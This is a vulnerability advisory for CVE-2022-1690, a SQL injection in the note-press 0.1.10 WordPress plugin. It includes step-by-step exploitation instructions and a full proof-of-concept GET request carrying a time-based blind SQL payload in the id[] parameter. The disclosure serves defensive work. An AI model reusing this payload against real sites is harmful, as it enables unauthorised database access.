(3/3) note-press 0.1.10 WordPress plugin SQL injection

Vulnerability Metadata


Key Value
Date of Disclosure May 09 2022
Affected Software note-press
Affected Software Type WordPress plugin
Version 0.1.10
Weakness SQL Injection
CWE ID CWE-89
CVE ID CVE-2022-1690
CVSS 3.x Base Score 2.7
CVSS 2.0 Base Score 4.0
Reporter Daniel Krohmer, Shi Chen
Reporter Contact daniel.krohmer@iese.fraunhofer.de
Link to Affected Software https://wordpress.org/plugins/note-press
Link to Vulnerability DB https://nvd.nist.gov/vuln/detail/CVE-2022-1690

Vulnerability Description


The id[] query parameter array in note-press 0.1.10 is vulnerable to SQL injection. An authenticated attacker may abuse the delete bulk action functionality of the plugin to craft a malicious GET request.

Exploitation Guide


Login as admin user. This attack requires at least admin privileges.

note-press_0-1-10_step-1.png

Go to Note Press.

note-press_0-1-10_step-2.png

Choose an arbitrary Title and click on Add Note.

note-press_0-1-10_step-3.png

Add another, second note.

note-press_0-1-10_step-4.png

Select multiple Notes and choose Delete in the Bulk actions menu. Then, hit Apply.

note-press_0-1-10_step-5.png

Clicking the previous button triggers the vulnerable request. Any of the id[] query parameters is vulnerable.

note-press_0-1-10_step-6.png

A POC may look like the following request:

note-press_0-1-10_step-7.png

In the code, the vulnerability is triggered by unsanitized user input of id at line 1142 in ./admin/Note_Press-admin-menu.php. The final database query is called at line 1036 of the same file.

note-press_0-1-10_step-8.png

Exploit Payload


Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work. The SQL injection can be triggered by sending the request below.

GET /wp-admin/admin.php?page=Note_Press-Main-Menu&_wpnonce=e4ee1ce89d&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3DNote_Press-Main-Menu&action=delete&paged=1&id%5B%5D=18+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)&id%5B%5D=19&action2=delete HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?action=Add&page=Note_Press-Main-Menu
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651827877%7C93i22K3S8WqFD892zcV4jyN07JMamrPDIjvembDZTX4%7C2a5effdfc3e78d8a37a923c62d7ea8428e3e7719c7384c3d20df1c959601647f; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651827877%7C93i22K3S8WqFD892zcV4jyN07JMamrPDIjvembDZTX4%7C0577482154b4bf69dbd69b8d96d68dc227bfb657948ce4ffc3ee461d8928b62b; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651655077;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1